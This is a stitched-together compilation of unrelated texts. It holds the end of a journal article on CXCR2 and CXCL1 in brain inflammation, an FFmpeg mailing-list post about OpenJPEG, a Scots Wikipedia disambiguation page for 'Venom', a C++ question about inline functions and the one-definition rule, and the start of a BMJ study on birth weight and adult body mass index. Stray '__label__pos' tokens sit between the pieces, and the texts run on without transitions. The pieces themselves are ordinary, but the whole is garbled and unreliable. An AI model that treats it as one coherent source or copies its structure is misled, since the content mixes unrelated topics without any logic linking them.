endothelial cells, astrocytes, and microglia, is more important than its expression on circulating cells during CNS inflammation. Moreover, TNF-α robustly induced a high expression of CXCR2 mRNA in primary murine endothelial cells, but not in primary microglia or astrocytes. High levels of expression of the CXCR2 mRNA and protein were detected in wild-type cerebral endothelial cells, which strongly indicates that endothelial CXCR2 is a key player mediating cerebral endothelial activation. To further validate the role of endothelial CXCR2, we intravenously injected SB225002 to block the function of CXCR2 in brain endothelial cells, as SB225002 in the blood circulation can easily access the brain endothelium. Compared with mice treated with LPS alone, both cerebral endothelial activation and leukocyte recruitment in the cerebral vessels were reduced in the mice treated with both SB225002 and LPS. Taken together, these data indicate that SB225002 potently inhibited CXCR2 function on brain endothelial cells, thereby blocked leukocyte recruitment. Astrocytes, which are more abundant than microglia in the brain [42], released much higher levels of CXCL1 than microglia in response to stimulation with LPS or TNF-α. Our study confirmed that astrocytes released significantly higher levels of CXCL1 than microglia in response to stimulation with LPS or TNF-α, suggesting that the main source of CXCL1 may be astrocytes. CXCL1 deficiency reduced leukocyte recruitment and endothelial activation by over 50 % in vivo. Astrocytes are essential structural components of the BBB [43, 44]; among all cell types in the brain, they have the easiest access to the brain endothelium and can release CXCL1, which possibly accumulate in the perivascular space at an extremely high concentration to activate cerebral endothelial cells. Therefore, the CXCL1 secreted from astrocytes and CXCR2 expressed on the endothelium may cooperate in contributing to cerebral endothelial activation and the subsequent leukocyte recruitment cascade during CNS inflammation. Conclusions Endothelial activation is a critical step in the process of leukocyte recruitment during CNS inflammation. In the current study, we found that either CXCR2 or CXCL1 deficiency resulted in reduced neutrophil infiltration and leukocyte–endothelial cell interactions in the brain. A dramatic reduction in the endothelial expression of adhesion molecules was also noted in these mice. Our results demonstrate that CXCL1, an important factor secreted by astrocytes, also plays a critical role in leukocyte recruitment to the CNS by cooperating with CXCR2 expressed on cerebral endothelial cells. The CXCL1-CXCR2 axis may represent another potential therapeutic target for the treatment of CNS inflammatory diseases. Abbreviations BBB: blood–brain barrier CNS: central nervous system CXCL: chemokine (CXC motif) ligand CXCR2: CXC chemokine receptor 2 ELISA: enzyme-linked immunosorbent assay i.c.v.: intracerebroventricular IL: interleukin LPS: lipopolysaccharide PCR: polymerase chain reaction TNF-α: tumor necrosis factor-α WT: wild-type β2-MG: β2-macroglobulin References 1. Giampaolo C, Scheld M, Boyd J, Savory J, Sande M, Wills M. Leukocyte and bacterial interrelationships in experimental meningitis. Ann Neurol. 1981;9:328–33. Article  CAS  PubMed  Google Scholar  2. Jin R, Yang G, Li G. Inflammatory mechanisms in ischemic stroke: role of inflammatory cells. J Leukoc Biol. 2010;87:779–89. Article  PubMed Central  CAS  PubMed  Google Scholar  3. Larochelle C, Alvarez JI, Prat A. How do immune cells overcome the blood-brain barrier in multiple sclerosis? FEBS Lett. 2011;585:3770–80. Article  CAS  PubMed  Google Scholar  4. Diab A, Abdalla H, Li HL, Shi FD, Zhu J, Höjberg B, et al. Neutralization of macrophage inflammatory protein 2 (MIP-2) and MIP-1alpha attenuates neutrophil recruitment in the central nervous system during experimental bacterial meningitis. Infect Immunity. 1999;67:2590–601. CAS  Google Scholar  5. McDonald B, Kubes P. Chemokines: sirens of neutrophil recruitment but is it just one song? Immunity. 2010;33:148–9. Article  CAS  PubMed  Google Scholar  6. Bernardes-Silva M, Anthony DC, Issekutz AC, Perry VH. Recruitment of neutrophils across the blood-brain barrier: the role of E- and P-selectins. J Cereb Blood Flow Metab. 2001;21:1115–24. Article  CAS  PubMed  Google Scholar  7. Ley K, Laudanna C, Cybulsky MI, Nourshargh S. Getting to the site of inflammation: the leukocyte adhesion cascade updated. Nat Rev Immunol. 2007;7:678–89. Article  CAS  PubMed  Google Scholar  8. Petri B, Phillipson M, Kubes P. The physiology of leukocyte recruitment: an in vivo perspective. J Immunol. 2008;180:6439–46. Article  CAS  PubMed  Google Scholar  9. Chen BP, Kuziel WA, Lane TE. Lack of CCR2 results in increased mortality and impaired leukocyte activation and trafficking following infection of the central nervous system with a neurotropic coronavirus. J Immunol. 2001;167:4585–92. Article  CAS  PubMed  Google Scholar  10. Reboldi A, Coisne C, Baumjohann D, Benvenuto F, Bottinelli D, Lira S, et al. C-C chemokine receptor 6-regulated entry of TH-17 cells into the CNS through the choroid plexus is required for the initiation of EAE. Nat Immunol. 2009;10:514–23. Article  CAS  PubMed  Google Scholar  11. Addison CL, Daniel TO, Burdick MD, Liu H, Ehlert JE, Xue YY, et al. The CXC chemokine receptor 2, CXCR2, is the putative receptor for ELR+ CXC chemokine-induced angiogenic activity. J Immunol. 2000;165:5269–77. Article  CAS  PubMed  Google Scholar  12. Raghuwanshi SK, Su Y, Singh V, Haynes K, Richmond A, Richardson RM. The chemokine receptors CXCR1 and CXCR2 couple to distinct G protein-coupled receptor kinases to mediate and regulate leukocyte functions. J Immunol. 2012;189:2824–32. Article  PubMed Central  CAS  PubMed  Google Scholar  13. Cai S, Batra S, Lira SA, Kolls JK, Jeyaseelan S. CXCL1 regulates pulmonary host defense to Klebsiella infection via CXCL2, CXCL5, NF-kappaB, and MAPKs. J Immunol. 2010;185:6214–25. Article  PubMed Central  CAS  PubMed  Google Scholar  14. Ritzman AM, Hughes-Hanks JM, Blaho VA, Wax LE, Mitchell WJ, Brown CR. The chemokine receptor CXCR2 ligand KC (CXCL1) mediates neutrophil recruitment and is critical for development of experimental Lyme arthritis and carditis. Infect Immun. 2010;78:4593–600. Article  PubMed Central  CAS  PubMed  Google Scholar  15. Ramos CD, Fernandes KS, Canetti C, Teixeira MM, Silva JS, Cunha FQ. Neutrophil recruitment in immunized mice depends on MIP-2 inducing the sequential release of MIP-1alpha, TNF-alpha and LTB(4). Eur J Immunol. 2006;36:2025–34. Article  CAS  PubMed  Google Scholar  16. Tumpey TM, Fenton R, Molesworth-Kenyon S, Oakes JE, Lausch RN. Role for macrophage inflammatory protein 2 (MIP-2), MIP-1alpha, and interleukin-1alpha in the delayed-type hypersensitivity response to viral antigen. J Virol. 2002;76:8050–7. Article  PubMed Central  CAS  PubMed  Google Scholar  17. Rose JJ, Foley JF, Murphy PM, Venkatesan S. On the mechanism and significance of ligand-induced internalization of human neutrophil chemokine receptors CXCR1 and CXCR2. J Biol Chem. 2004;279:24372–86. Article  CAS  PubMed  Google Scholar  18. Lippert U, Zachmann K, Henz BM, Neumann C. Human T lymphocytes and mast cells differentially express and regulate extra- and intracellular CXCR1 and CXCR2. Exp Dermatol. 2004;13:520–5. Article  CAS  PubMed  Google Scholar  19. Svensson M, Irjala H, Svanborg C, Godaly G. Effects of epithelial and neutrophil CXCR2 on innate immunity and resistance to kidney infection. Kidney Int. 2008;74:81–90. Article  CAS  PubMed  Google Scholar  20. Heidemann J, Ogawa H, Dwinell MB, Rafiee P, Maaser C, Gockel HR, et al. Angiogenic effects of interleukin 8 (CXCL8) in human intestinal microvascular endothelial cells are mediated by CXCR2. J Biol Chem. 2003;278:8508–15. Article  CAS  PubMed  Google Scholar  21. Reutershan J, Morris MA, Burcin TL, Smith DF, Chang D, Saprito MS, et al. Critical role of endothelial CXCR2 in LPS-induced neutrophil migration into the lung. J Clin Invest. 2006;116:695–702. Article  PubMed Central  CAS  PubMed  Google Scholar  22. Lei ZB, Zhang Z, Jing Q, Qin YW, Pei G, Cao BZ, et al. OxLDL upregulates CXCR2 expression in monocytes via scavenger receptors and activation of p38 mitogen-activated protein kinase. Cardiovasc Res. 2002;53:524–32. Article  CAS  PubMed  Google Scholar  23. Bonecchi R, Facchetti F, Dusi S, Luini W, Lissandrini D, Simmelink M, et al. Induction of functional IL-8 receptors by IL-4 and IL-13 in human monocytes. J Immunol. 2000;164:3862–9. Article  CAS  PubMed  Google Scholar  24. Eash KJ, Greenbaum AM, Gopalan PK, Link DC. CXCR2 and CXCR4 antagonistically regulate neutrophil trafficking from murine bone marrow. J Clin Invest. 2010;120:2423–31. Article  PubMed Central  CAS  PubMed  Google Scholar  25. von Vietinghoff S, Asagiri M, Azar D, Hoffmann A, Ley K. Defective regulation of CXCR2 facilitates neutrophil release from bone marrow causing spontaneous inflammation in severely NF-kappa B-deficient mice. J Immunol. 2010;185:670–8. Article  Google Scholar  26. Hu N, Westra J, Rutgers A, Doornbos-Van der Meer B, Huitema MG, Stegeman CA, et al. Decreased CXCR1 and CXCR2 expression on neutrophils in anti-neutrophil cytoplasmic autoantibody-associated vasculitides potentially increases neutrophil adhesion and impairs migration. Arthritis Res Ther. 2011;13:R201. Article  PubMed Central  CAS  PubMed  Google Scholar  27. Mei J, Liu Y, Dai N, Hoffmann C, Hudock KM, Zhang P, et al. Cxcr2 and Cxcl5 regulate the IL-17/G-CSF axis and neutrophil homeostasis in mice. J Clin Invest. 2012;122:974–86. Article  PubMed Central  CAS  PubMed  Google Scholar  28. Hallgren J, Jones TG, Abonia JP, Xing W, Humbles A, Austen KF, et al. Pulmonary CXCR2 regulates VCAM-1 and antigen-induced recruitment of mast cell progenitors. Proc Natl Acad Sci USA. 2007;104:20478–83. Article  PubMed Central  CAS  PubMed  Google Scholar  29. Zhou H, Lapointe BM, Clark SR, Zbytnuik L, Kubes P. A requirement for microglial TLR4 in leukocyte recruitment into brain in response to lipopolysaccharide. J Immunol. 2006;177:8103–10. Article  CAS  PubMed  Google Scholar  30. Koedel U, Rupprecht T, Angele B, Heesemann J, Wagner H, Pfister HW, et al. MyD88 is required for mounting a robust host immune response to Streptococcus pneumoniae in the CNS. Brain. 2004;127:1437–45. Article  PubMed  Google Scholar  31. Floden AM, Combs CK. Microglia repetitively isolated from in vitro mixed glial cultures retain their initial phenotype. J Neurosci Methods. 2007;164:218–24. Article  CAS  PubMed  Google Scholar  32. Schildge S, Bohrer C, Beck K, Schachtrup C. Isolation and culture of mouse cortical astrocytes. J Vis Exp. 2013;71:50079. PubMed  Google Scholar  33. Wu Z, Hofman FM, Zlokovic BV. A simple method for isolation and characterization of mouse brain microvascular endothelial cells. J Neurosci Methods. 2003;130:53–63. Article  CAS  PubMed  Google Scholar  34. Egen JG, Rothfuchs AG, Feng CG, Winter N, Sher A, Germain RN. Macrophage and T cell dynamics during the development and disintegration of mycobacterial granulomas. Immunity. 2008;28:271–84. Article  PubMed Central  CAS  PubMed  Google Scholar  35. Jang JE, Hod EA, Spitalnik SL, Frenette PS. CXCL1 and its receptor, CXCR2, mediate murine sickle cell vaso-occlusion during hemolytic transfusion reactions. J Clin Invest. 2011;121:1397–401. Article  PubMed Central  CAS  PubMed  Google Scholar  36. Ransohoff RM, Kivisakk P, Kidd G. Three or more routes for leukocyte migration into the central nervous system. Nat Rev Immunol. 2003;3:569–81. Article  CAS  PubMed  Google Scholar  37. Rossi B, Angiari S, Zenaro E, Budui SL, Constantin G. Vascular inflammation in central nervous system diseases: adhesion receptors controlling leukocyte-endothelial interactions. J Leukoc Biol. 2011;89:539–56. Article  CAS  PubMed  Google Scholar  38. Zhang K, Tian L, Liu L, Feng Y, Dong YB, Li B, et al. CXCL1 contributes to β-amyloid-induced transendothelial migration of monocytes in Alzheimer’s disease. PLoS One. 2013;8:e72744. Article  PubMed Central  CAS  PubMed  Google Scholar  39. Dwyer J, Hebda JK, Le Guelte A, Galan-Moya EM, Smith SS, Azzi S, et al. Glioblastoma cell-secreted interleukin-8 induces brain endothelial cell permeability via CXCR2. PLoS One. 2012;7:e45562. Article  PubMed Central  CAS  PubMed  Google Scholar  40. Goczalik I, Ulbricht E, Hollborn M, Raap M, Uhlmann S, Weick M, et al. Expression of CXCL8, CXCR1, and CXCR2 in neurons and glial cells of the human and rabbit retina. Invest Ophthalmol Vis Sci. 2008;49:4578–89. Article  PubMed  Google Scholar  41. Omari KM, John G, Lango R, Raine CS. Role for CXCR2 and CXCL1 on glia in multiple sclerosis. Glia. 2006;53:24–31. Article  PubMed  Google Scholar  42. Savchenko VL, McKanna JA, Nikonenko IR, Skibo GG. Microglia and astrocytes in the adult rat brain: comparative immunocytochemical analysis demonstrates the efficacy of lipocortin 1 immunoreactivity. Neuroscience. 2000;96:195–203. Article  CAS  PubMed  Google Scholar  43. Abbott NJ, Rönnbäck L, Hansson E. Astrocyte-endothelial interactions at the blood-brain barrier. Nat Rev Neurosci. 2006;7:41–53. Article  CAS  PubMed  Google Scholar  44. Ballabh P, Braun A, Nedergaard M. The blood-brain barrier: an overview: structure, regulation, and clinical implications. Neurobiol Dis. 2004;16:1–13. Article  CAS  PubMed  Google Scholar  Download references Acknowledgements This work was supported by the National Natural Science Foundation of China (Grant Nos. 81172796 and 81373225) and the Natural Science Foundation of Jiangsu Province (Grant No. BK2011769). Author information Affiliations Authors Corresponding author Correspondence to Hong Zhou. Additional information Competing interests The authors declare that they have no competing interests. Authors’ contributions HZ designed the experiments, supervised the project, and drafted the manuscript. FW performed most of the experiments and participated in the study design. YZ and XZ performed the flow cytometry, ELISA, and real-time PCR. TJ performed real-time PCR. DS and MZ contributed to the experimental design and data analysis. MS was involved in the study design and helped to draft the manuscript. All authors read and approved the final manuscript. Rights and permissions Open Access  This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article’s Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article’s Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit https://creativecommons.org/licenses/by/4.0/. The Creative Commons Public Domain Dedication waiver (https://creativecommons.org/publicdomain/zero/1.0/) applies to the data made available in this article, unless otherwise stated in a credit line to the data. Reprints and Permissions About this article Verify currency and authenticity via CrossMark Cite this article Wu, F., Zhao, Y., Jiao, T. et al. CXCR2 is essential for cerebral endothelial activation and leukocyte recruitment during neuroinflammation. J Neuroinflammation 12, 98 (2015). https://doi.org/10.1186/s12974-015-0316-6 Download citation • Received: • Accepted: • Published: • DOI: https://doi.org/10.1186/s12974-015-0316-6 Keywords • CNS inflammation • CXCL1 • CXCR2 • Astrocyte • Endothelial activation • Leukocyte recruitment • Intravital microscopy
__label__pos
0.753672
[FFmpeg-devel] Can we drop OpenJPEG 1.5 in favor of 2.x? Carl Eugen Hoyos cehoyos at ag.or.at Sat Oct 24 20:11:08 CEST 2015 James Almer <jamrial <at> gmail.com> writes: > Why does configure even check for 2.x if the actual > lavc wrappers don't currently support it? It is possible to use openjpeg2 with current FFmpeg (I use it for testing) but it is everything but user-friendly. Carl Eugen More information about the ffmpeg-devel mailing list
__label__pos
0.958092
Venom Frae Wikipedia Lowp tae: navigation, rake Venom or venomous mey refer tae: • Pushion, a class o animal toxins • Venom clade, an aa kent as Toxicofera, a group o reptiles containing snakes an some lizard families • de Havilland Venom, a jet-powered fighter-bomber in service from 1952 to 1967 • Devil's venom, a nickname coined by Soviet rocket scientists for their dangerous liquid rocket fuel mixture • Red Venom, a fictional spacecraft in the Manta Force toyline • Velocette Venom, a 500cc model of Velocette motorcycle made in Britain • Venom Energy Drink • VeNom Coding Group, a standardization in the names and terms used in veterinary medicine In comics[edit] • Venom (comics), a symbiotic alien-life form an arch-enemy o Spider-Man in the Marvel Comics universe. In its fictional history the Venom alien haes merged wi a number o human hosts who hae taken on the alias o Venom: • Venom (Transformers) - A Decepticon • Venom, a fictional drug uised in the DC Comics universe, maist famously bi the character Bane In film an television[edit] In muisic[edit] In games[edit]
__label__pos
0.947657
NJMR NJMR - 4 months ago 23 C++ Question One Definition Rule - Multiple definition of inline functions I was reading ODR and as the rule says "In the entire program, an object or non-inline function cannot have more than one definition" and I tried the following... file1.cpp #include <iostream> using namespace std; inline int func1(void){ return 5; } inline int func2(void){ return 6; } inline int func3(void){ return 7; } int sum(void); int main(int argc, char *argv[]) { cout << func1() << endl; cout << func2() << endl; cout << func3() << endl; cout << sum() << endl; return 0; } file2.cpp inline int func1(void) { return 5; } inline int func2(void) { return 6; } inline int func3(void) { return 7; } int sum(void) { return func1() + func2() + func3(); } It worked as the rule says. I can have multiple definition of inline functions. • What is the difference between non-inline function linkage and inline function linkage? • How the linker differentiate between these two? Answer Making a function inline does two things (the second point is more relevant to your question): 1. It is a suggestion by the programmer to the compiler, to make calls to this function fast, possibly by doing inline expansion. Roughly, inline expansion is similar to treating the inline function like a macro, expanding each call to it, by the code of its body. This is a suggestion - the compiler may not (and sometimes cannot) perform various optimizations like that. 2. It specifies the scope of the function to be that of a translation unit. So, if an inline function appears in foo.cpp (either because it was written in it, or because it #includes a header in which it was written, in which case the preprocessor basically makes it so). Now you compile foo.cpp, and possibly also some other bar.cpp which also contains an inline function with the same signature (possibly the exact same one; probably due to both #includeing the same header). When the linker links the two object files, it will not be considered a violation of the ODR, as the inline directive made each copy of the file local to its translation unit (the object file created by compiling it, effectively). This is not a suggestion, it is binding. It is not coincidental that these two things go together. The most common case is for an inline function to appear in a header #included by several source files, probably because the programmer wanted to request fast inline expansion. This requires the translation-unit locality rule, though, so that linker errors shouldn't arise.
__label__pos
0.999474
Multi-page app with session state When you use an IDE debugger with this code, it can’t get a Session ID from the IDE itself, so you get this message: " session_id = get_report_ctx().session_id AttributeError: ‘NoneType’ object has no attribute ‘session_id’ " I understand why we get this error, but what is the solution? How do we debug our code using the debugger when our local IDE can’t generate a sesion_id? Hello @euler, if you have some data that must be cleared every run, the best way to do it is to keep them out of the session state I guess. Could you describe more precisely your usecase? Hello @ksxx, unfortunately it’s not possible to change widget values programmatically for now. This session state doesn’t support it, and I don’t know any that does. Hello @an_pas, I don’t know that object. If you’re still encountering this issue,you could maybe use @thiago’s SessionState which does not use any hashing mechanism. My implementation is mostly useful if you want to bind widget values to session state variables. Hello @OlliePage, your IDE tries to run your app as a regular python script, but in that case it won’t load a ReportContext object. In your case, try to use this _get_state() function. When run as a script, using a module like sys to keep your session state should work fine. import sys # ... def _get_state(hash_funcs=None): try: session = _get_session() except (AttributeError, RuntimeError): session = sys if not hasattr(session, "_custom_session_state"): session._custom_session_state = _SessionState(session, hash_funcs) return session._custom_session_state That did the trick. Thanks very much. That’s made the world of difference. 1 Like I tried to set the page config but an error came out stated that I can only call it once. I suspect it’s probably due to how multiple app structure calling it. Is there any hack around this? @okld StreamlitAPIException : set_page_config() can only be called once per app, and must be called as the first Streamlit command in your script.
__label__pos
0.892923
top of page A Comprehensive Guide to Sports Injury Rehabilitation Sports are a fantastic way to stay active and healthy, but they come with the risk of injury. Whether you're a professional athlete or a weekend warrior, sports injuries can be a significant setback. However, the road to recovery and getting back in the game starts with proper sports injury rehabilitation. In this comprehensive guide, we will explore the key aspects of sports injury rehabilitation, from understanding the types of injuries to the essential steps in the rehabilitation process. We'll also discuss the role of experts in this field and provide you with valuable insights to help you or someone you know recover and return to the field stronger than ever. Understanding Sports Injuries Before diving into the intricacies of sports injury rehabilitation, it's crucial to have a solid understanding of the types of injuries athletes commonly encounter. Sports injuries can be broadly categorized into two main types: acute and overuse injuries. Acute Injuries Acute injuries are those that occur suddenly, often due to a traumatic event or accident. Common examples include sprains, strains, fractures, dislocations, and concussions. Acute injuries require immediate attention, including proper diagnosis and initial treatment. Overuse Injuries On the other hand, overuse injuries are typically the result of repetitive motions and stress on specific body parts. These can include conditions like tendinitis, stress fractures, and muscle imbalances. Overuse injuries develop over time and may not be immediately noticeable, making early detection and rehabilitation crucial. The Role of Sports Injury Rehabilitation Sports injury rehabilitation is a comprehensive process that aims to restore an athlete's functionality and performance following an injury. The primary objectives of rehabilitation are: Pain Management: Alleviating pain and discomfort to improve the athlete's quality of life. Restoring Function: Restoring range of motion, strength, and flexibility to the injured area. Preventing Recurrence: Reducing the risk of re-injury through proper rehabilitation and conditioning. Optimizing Performance: Helping athletes regain their peak performance levels and even surpass them. Now, let's delve into the key components of an effective sports injury rehabilitation program. Key Components of Sports Injury Rehabilitation Medical Assessment and Diagnosis The first step in any rehabilitation process is a thorough medical assessment and diagnosis. This involves a comprehensive evaluation by a sports medicine specialist or a healthcare provider with experience in sports injuries. The goal is to identify the type and extent of the injury. This often includes imaging tests like X-rays or MRI scans for acute injuries, and a detailed physical examination for overuse injuries. Individualized Treatment Plan Once the injury is diagnosed, a personalized treatment plan is developed. This plan takes into account the athlete's age, overall health, and specific goals. It includes various components such as: Rest and Immobilization: In many cases, rest and immobilization of the injured area are essential to allow proper healing. Physical Therapy: A crucial part of rehabilitation, physical therapy includes exercises and techniques to improve strength, flexibility, and function. Rehabilitation Exercises A cornerstone of sports injury rehabilitation is a carefully designed exercise program. These exercises are tailored to the individual's injury and can include stretching, strengthening, and functional movements. The main goal is to rebuild the injured area's strength and flexibility. A certified sports physical therapist plays a pivotal role in guiding athletes through these exercises, ensuring they are performed correctly to maximize recovery. Manual Therapy and Modalities Physical therapists may use manual therapy techniques like massage, joint mobilization, and myofascial release to improve blood flow, reduce muscle tension, and aid in the healing process. Additionally, modalities like ultrasound and electrical stimulation may be used to further expedite healing and reduce pain. Return to Play Protocol Returning to the sport or activity too quickly can result in re-injury. To prevent this, a gradual "Return to Play" protocol is typically employed. This protocol is individualized, progressing from light activities to full participation, closely monitored by the rehabilitation team. The Role of Experts in Sports Injury Rehabilitation Successful sports injury rehabilitation relies on a multidisciplinary approach, with various experts playing crucial roles: Sports Medicine Physicians Sports medicine physicians are at the forefront of diagnosis and treatment. They provide initial evaluations, make critical decisions regarding surgery when necessary, and manage the overall rehabilitation process. Physical Therapists Certified sports physical therapists are experts in guiding athletes through their exercises, ensuring proper form and intensity. They work closely with athletes to facilitate a safe and effective recovery. Orthopedic Surgeons For severe injuries requiring surgical intervention, orthopedic surgeons are essential. They perform the necessary procedures and work closely with the rehabilitation team to ensure a seamless transition from surgery to recovery. Athletic Trainers Athletic trainers often work directly with athletes on the field, providing immediate care for acute injuries. They also assist with rehabilitation and help in the prevention of further injuries. Nutritionists Proper nutrition is essential for recovery. Nutritionists ensure that athletes are getting the necessary nutrients to support healing and tissue repair. Psychologists or Counselors Dealing with a sports injury can be mentally challenging. Psychologists or counselors can help athletes cope with the emotional and psychological aspects of their injuries. Nutritional Support in Sports Injury Rehabilitation Good nutrition is a fundamental part of the rehabilitation process. Athletes should focus on consuming a balanced diet that includes: Proteins: Essential for tissue repair and muscle growth. Carbohydrates: Provide the energy required for rehabilitation exercises. Healthy Fats: Aid in reducing inflammation and supporting overall health. Vitamins and Minerals: Play a vital role in the body's healing processes. A registered dietitian can work with athletes to create a personalized nutrition plan that aligns with their specific rehabilitation needs. Coping with Psychological Aspects of Sports Injury Sports injury rehabilitation isn't just about the body; it's also about the mind. Dealing with the emotional and psychological aspects of an injury is crucial for a successful recovery. Athletes may experience frustration, anxiety, and even depression during this process. Seeking support from a sports psychologist or counselor can help individuals cope with these challenges and maintain a positive outlook. Preventing Future Injuries Prevention is always better than cure. To reduce the risk of future sports injuries, athletes should consider the following: Proper Warm-up and Cool-down: Incorporate dynamic warm-up and stretching routines before and after physical activities to prepare the body and prevent strains. Cross-training: Engage in a variety of activities to avoid overuse injuries and promote overall fitness. Use Protective Gear: Ensure you have the appropriate protective equipment for your sport and use it consistently. Listen to Your Body: Don't push through pain. If you feel discomfort or pain during a workout or game, it's essential to address it promptly. Regular Conditioning: Maintain strength and flexibility through regular strength training and conditioning exercises. Conclusion Sports injury rehabilitation is a complex and multifaceted process that requires expertise from various professionals, including sports medicine physicians, physical therapists, and nutritionists. By following a personalized rehabilitation plan and listening to your body, you can recover from injuries and return to your sport stronger than ever. Remember that recovery takes time, patience, and dedication, but the end result is well worth the effort. Whether you're a professional athlete or a dedicated enthusiast, a well-executed rehabilitation program can get you back in the game and keep you there, performing at your best. Commentaires bottom of page
__label__pos
0.876103
Cellulite Diet Cellulite is fat that has been trapped in fibrous pockets close to the skin. Cellulite is hardened fat cells that have been trapped in the body’s network of muscle tissue and fiber. This tissue and fiber is constantly flushed by cleansing fluids through the day and the result is a very ugly bloated look. Diet to fight cellulite should include extra intake in fruit, vegetables, wholegrain, and beans. Cleansing the affected area and decreasing the excess toxins may be beneficial to remove cellulite and enhances the skin’s quality. Fresh fruits and green leafy vegetables are beneficial to clean the body and removes stored toxins. The fresh fruits and vegetables include multiple factors like minerals, fiber and physiochemical. Antioxidants are also included in the fruits and vegetables. Injury imposed is also eliminated by complimentary radicals on the body. there is nothing short of weight control and exercise that will help keep cellulite under control. Nutrients in Vitamin B, C and E, essential fatty acids, glucosamine, calcium, iodine, fibre and potassium – e.g. avocados, oily fish, bananas, bran and oat cereals, pears, asparagus, broccoli and such are all good sources of foods to treat cellulite There is some slight evidence that smoking and caffeine may worsen the appearance of cellulite, possibly since they constrict blood vessels. Consumption of alcohol in any form causes the cellulite deposits in the body to increase dramatically. Sometimes, cellulite is most terrible by several foods. These foods contain alcohol, refined foods or a diet with soda and high animal protein. Cellulite deposits can be lowered or done away with completely with the right nutrition through diet and the right amount of exercise. Such a routine will, over a period of time, definitely reduce the cellulite deposits by metabolizing the fat stores for energy. Cellulite diet – Detoxification diet may help to reduce cellulite by improving on cellulite related functions. Anti cellulite detoxification diet means giving up on fatty, junk foods, and getting plenty of exercise. In addition, vigorous massages to the cellulite affected area helps to improve circulation and to flush out toxins built-up in the body. Cellulite Diet Tips 1. Cut down on the amount of fat you eat. Grill rather than frying foods, cut off visible fat from meat. 2. Drink at least 2 litres of pure water every day. Water cleanses your system and flushes toxins from body cells. 3. Eat at least 5 servings of fresh fruit and vegetables every day. 4. Stay away from alcohol as much as possible as it adversely affects your liver – your body’s main de-toxifier. 5. Avoid sugary snacks between meals. You may eat a piece of fruit, raw vegetables or rice cakes instead. 6. Drink a glass of hot water containing the huice of a fresh lemon when you get up in the morning.
__label__pos
0.792628
JavaScript混淆技术解析:如何保护前端代码的安全与隐私 JavaScript混淆技术是一种对前端代码进行处理的方法,旨在保护代码的安全与隐私 本文将详细介绍JavaScript混淆技术的原理、用途和常见实现方法。 一、什么是JavaScript混淆 JavaScript混淆是一种对JavaScript源代码进行处理的技术,将代码转换为难以阅读和理解的形式,以保护代码的安全性和隐私。 混淆技术通过变量名替换、代码压缩、逻辑混合等方法实现。 二、JavaScript混淆的作用 JavaScript混淆技术主要具有以下作用: 1. 保护代码安全:通过混淆处理,使得源代码难以阅读和理解,提高了破解和反编译的难度,保护了代码的安全性。 2. 保护知识产权:混淆后的代码难以直接复制和修改,有助于保护知识产权和避免代码被盗用。 3. 优化代码性能:混淆过程中会对代码进行压缩和优化,有助于减小文件大小和提高运行速度。 三、常见的JavaScript混淆方法 1. 变量名替换:将源代码中的变量名、函数名等标识符替换为简短且难以理解的名称,如”a”, “b”, “c”等。 2. 代码压缩:删除源代码中的空格、换行、注释等多余字符,减小文件大小。 3. 逻辑混合:修改代码结构,如将if语句替换为三元操作符、使用eval执行字符串形式的代码等。 4. 加密字符串:对源代码中的字符串进行加密,如将”hello”替换为一串不易识别的字符。 5. 自解密代码:在代码中添加自解密逻辑,使得代码在运行时自动解密并执行。 四、JavaScript混淆工具 有许多开源和商业的JavaScript混淆工具可供选择,如UglifyJS、Terser、Google Closure Compiler等。 这些工具提供了多种混淆选项,可以根据需要进行定制。 # 使用UglifyJS进行混淆 uglifyjs input.js -o output.js -c -m # 使用Terser进行混淆 terser input.js -o output.js -c -m # 使用Google Closure Compiler进行混淆 java -jar closure-compiler.jar --js input.js --js_output_file output.js --compilation_level ADVANCED 总结 JavaScript混淆技术在保护前端代码的安全与隐私方面具有重要作用。 通过了解混淆的原理、用途和实现方法,开发者可以更好地防范潜在的安全风险和知识产权纠纷。 然而,需要注意的是,混淆技术并不能完全阻止攻击者对代码的分析和破解,因此在前端安全方面仍需结合其他安全措施进行综合防护。 例如,可以采用HTTPS协议保护数据传输的安全、使用CSP(内容安全策略)限制外部资源的加载、加强后端接口的安全验证等。 阅读剩余 THE END
__label__pos
0.788463
Intended for healthcare professionals Papers Fetal and early life growth and body mass index from birth to early adulthood in 1958 British cohort: longitudinal study BMJ 2001; 323 doi: https://doi.org/10.1136/bmj.323.7325.1331 (Published 08 December 2001) Cite this as: BMJ 2001;323:1331 1. Tessa J Parsons, research fellow (t.parsons{at}ich.ucl.ac.uk)a, 2. Chris Power, readera, 3. Orly Manor, senior lecturerb 1. a Department of Paediatric Epidemiology and Biostatistics, Institute of Child Health, London WC1N 1EH 2. b School of Public Health and Community Medicine, Hebrew University, Jerusalem 91120, Israel 1. Correspondence to: T Parsons • Accepted 29 June 2001 Abstract Objectives: To determine the influence of birth weight on body mass index at different stages of later life; whether this relation persists after accounting for potential confounding factors; and the role of indicators of fetal growth (birth weight relative to parental size) and childhood growth. Design: Longitudinal study of the 1958 British birth cohort. Setting: England, Scotland, and Wales. Participants: All singletons born 3–9 March 1958 (10 683 participants with data available at age 33). Main outcome measures: Body mass index at ages 7, 11, 16, 23, and 33 years. Results: The relation between birth weight and body mass index was positive and weak, becoming more J shaped with increasing age. When adjustments were made for maternal weight, there was no relation between birth weight and body mass index at age 33. Indicators of poor fetal growth based on the mother's body size were not predictive, but the risk of adult obesity was higher among participants who had grown to a greater proportion of their eventual adult height by age 7. In men only, the effect of childhood growth was strongest in those with lower birth weights and, to a lesser extent, those born to lighter mothers. Conclusions: Maternal weight (or body mass index) largely explains the association between birth weight and adult body mass index, and it may be a more important risk factor for obesity in the child than birth weight. Birth weight and maternal weight seem to modify the effect of childhood linear growth on adult obesity in men. Intergenerational associations between the mother's and her offspring's body mass index seem to underlie the well documented association between birth weight and body mass index. Other measures of fetal growth are needed for a fuller understanding of the role of the intrauterine environment in the development of obesity. What is already known on this topic What is already known on this topic Birth weight has been shown to be positively related to subsequent fatness Few studies have investigated whether this relation is confounded by other factors, such as parental size Birth weight may be an inadequate indicator of the intrauterine environment What this study adds What this study adds The relation between birth weight and adult body mass index was largely accounted for by mother's weight Fetal growth indexed by birth weight relative to parental body size was unrelated to adult obesity Rapid linear 